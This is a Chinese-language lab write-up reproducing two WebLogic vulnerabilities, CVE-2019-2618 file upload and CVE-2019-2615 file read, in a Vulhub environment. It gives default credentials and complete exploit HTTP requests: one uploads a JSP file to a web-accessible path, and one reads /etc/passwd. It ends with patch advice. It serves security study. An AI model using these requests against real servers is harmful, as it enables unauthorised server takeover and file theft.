1.漏洞介绍

CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。

2.影响版本

WebLogic 10.3.6.0、12.1.3.0、12.2.1.3

3.漏洞复现

3.1漏洞环境

使用Vulhub里面的CVE-2017-10271环境作为漏洞环境

  1. root@kali:~/vulhub/weblogic/CVE-2017-10271# ls
  2. 1.png  docker-compose.yml  README.md  set_mirror.sh
  3. root@kali:~/vulhub/weblogic/CVE-2017-10271# docker-compose up -d

访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动
image.png

3.2漏洞利用

漏洞前提是需要先获取weblogic的账号密码
weblogic/weblogic
weblogic/Oracle@123

  1. POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
  2. Host: 192.168.64.161:7001
  3. Connection: close
  4. Accept-Encoding: gzip, deflate
  5. Accept: */*
  6. User-Agent: python-requests/2.21.0
  7. username: weblogic
  8. wl_request_type: app_upload
  9. cache-control: no-cache
  10. wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
  11. serverName: test
  12. password: Oracle@123
  13. content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
  14. archive: true
  15. server_version: 10.3.6.0
  16. wl_upload_delta: true
  17. Content-Length: 1081
  19. ------WebKitFormBoundary7MA4YWxkTrZu0gW
  20. Content-Disposition: form-data; name="img"; filename="test.jsp"
  21. Content-Type: false
  23. <%
  24.         out.print("123456"); 
  25. %>
  27. ------WebKitFormBoundary7MA4YWxkTrZu0gW--

image.png
http://192.168.64.161:7001/bea_wls_internal/test.jsp
image.png
其他上传目录

  1. /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/bea_wls_deployment_internal.war
  2. /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/bea_wls_internal.war 这是上传的路径
  3. /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal
  4. /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_deployment_internal
  5. bea_wls_internal 
  6. bea_wls_deployment_internal 在同目录
  7. 这是漏洞war位置

大佬的脚本
https://github.com/jas502n/cve-2019-2618
image.png
image.png

4.修复建议

Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞
链接:https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

CVE-2019-2615任意文件读取

同样需要weblogic的账号密码,就放在一起了
poc:

  1. GET /bea_wls_management_internal2/wl_management HTTP/1.1
  2. Host: 192.168.64.161:7001
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. DNT: 1
  8. Cookie: JSESSIONID=s2mFdQTcMRV8qfzH2GBP1BQ8gnw30g5vGkN1dsP2Qd9s2HMsXxYQ!-1466636554
  9. Connection: close
  10. username: weblogic
  11. password: Oracle@123
  12. wl_request_type: wl_jsp_refresh_request
  13. adminPath: /etc/passwd
  14. Upgrade-Insecure-Requests: 1

拦截-抓包-repeater
image.png